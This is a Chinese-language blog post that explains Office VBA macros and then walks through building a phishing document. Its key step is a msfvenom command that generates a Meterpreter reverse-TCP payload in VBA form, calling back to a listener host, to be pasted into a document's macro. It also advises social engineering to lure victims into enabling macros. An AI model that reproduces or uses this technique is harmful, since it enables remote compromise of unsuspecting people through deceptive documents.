office宏,译自英文单词Macro。宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。

虽然Office宏会给我们的工作带来便利,但是也埋下了巨大的安全隐患。

先来看一下Office中关于宏的默认设置。

左上角–>文件–>选项

Office钓鱼

Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件,也可说是一种应用程式视觉化的Basic 脚本。

首先使用msf生成payload: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=4444 -f vba -o shellcode.txt

如果没有msf则安装https://blog.csdn.net/weixin_40943540/article/details/83316998

发现WPS2019不能启动宏,需要下个宏插件

我们打开了Visul Basic,找到ThisDocument,并将msf生成的代码复制进去保存,如下:

我们可以看到一个关于宏的警告,只要我们不点启用,msf是不会上线的。

现在我们在msf中设置好监听:

开启监听并启用宏:

由于Office宏隐蔽性差,所以不可单独使用,这时社会工程学便派上了用场。利用人们思维的定向性,制造一个可欺骗度高的文档,来诱惑人们点击,从而使危害扩大化。

参考链接:https://mp.weixin.qq.com/s?__biz=MzI5MTkyNTkyOQ==&mid=2247484098&idx=1&sn=fea76d3cd8d1c90b2ca3b457f5bf3fb6&chksm=ec087804db7ff112be1c22d08d29287418af83b62c18f9f44c39116a3d5c6cdff7915266cdb4&mpshare=1&scene=1&srcid=&sharer_sharetime=1582604426496&sharer_shareid=71cadfa52e2be93573b54a69aeddea8b&key=73a5ba40d4f98e884bfe181640833d27c6618c11388735409f4574038301539e0a7c785d966633da495e06d82582aedbf93bb38bdebab386965991af544993353cd08c4d415f1595a862e97346a00ccf&ascene=1&uin=NzUzNTMxNTMz&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=A9Gr6gfzoi2NhPzMWLfB8f8%3D&pass_ticket=7PVBlYguNpbLzOX0jHMKSayKTQyCRc%2F7JmPSQvGfARa8TQfgIms9s0t8xxT3KPBE

centos7安装msf5https://blog.csdn.net/weixin_30341745/article/details/102289766?utm_source=app

最后修改日期:2020年2月26日

作者